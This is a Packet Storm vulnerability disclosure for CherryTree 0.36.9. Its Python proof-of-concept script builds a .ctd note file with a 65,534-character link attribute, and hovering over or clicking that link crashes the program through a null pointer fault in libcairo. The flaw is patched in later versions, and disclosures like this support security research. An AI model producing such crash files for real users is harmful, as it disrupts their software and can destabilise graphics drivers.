CherryTree 0.36.9 Memory Corruption

2016-10-27T00:00:00
ID PACKETSTORM:139372
Type packetstorm
Reporter n30m1nd
Modified 2016-10-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###   
  
# Date: 2016-10-27  
# PoC Author: n30m1nd  
# Vendor Homepage: http://www.giuspen.com/cherrytree/  
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe  
# Version: Affects all versions of CherryTree prior to 0.37.6  
# Tested on: Win7 64bit and Win10 64 bit  
  
# Credits  
# =======  
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.  
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better  
  
# How to  
# ======  
# * Run this python script. It will generate a "PoC-1.ctd" file.  
# * Open the file and hover over the link.  
# Bonus  
# =====  
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)  
  
# Why?  
# ====  
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when  
# trying to draw the contents of the graphical bitmaps.  
  
# Exploit code  
# ============  
  
crashfile = '''<?xml version="1.0" ?>  
<cherrytree>  
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">  
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>  
</node>  
</cherrytree>  
'''  
  
with open("PoC-1.ctd", 'w') as f:  
f.write(crashfile)  
f.close()  
  
`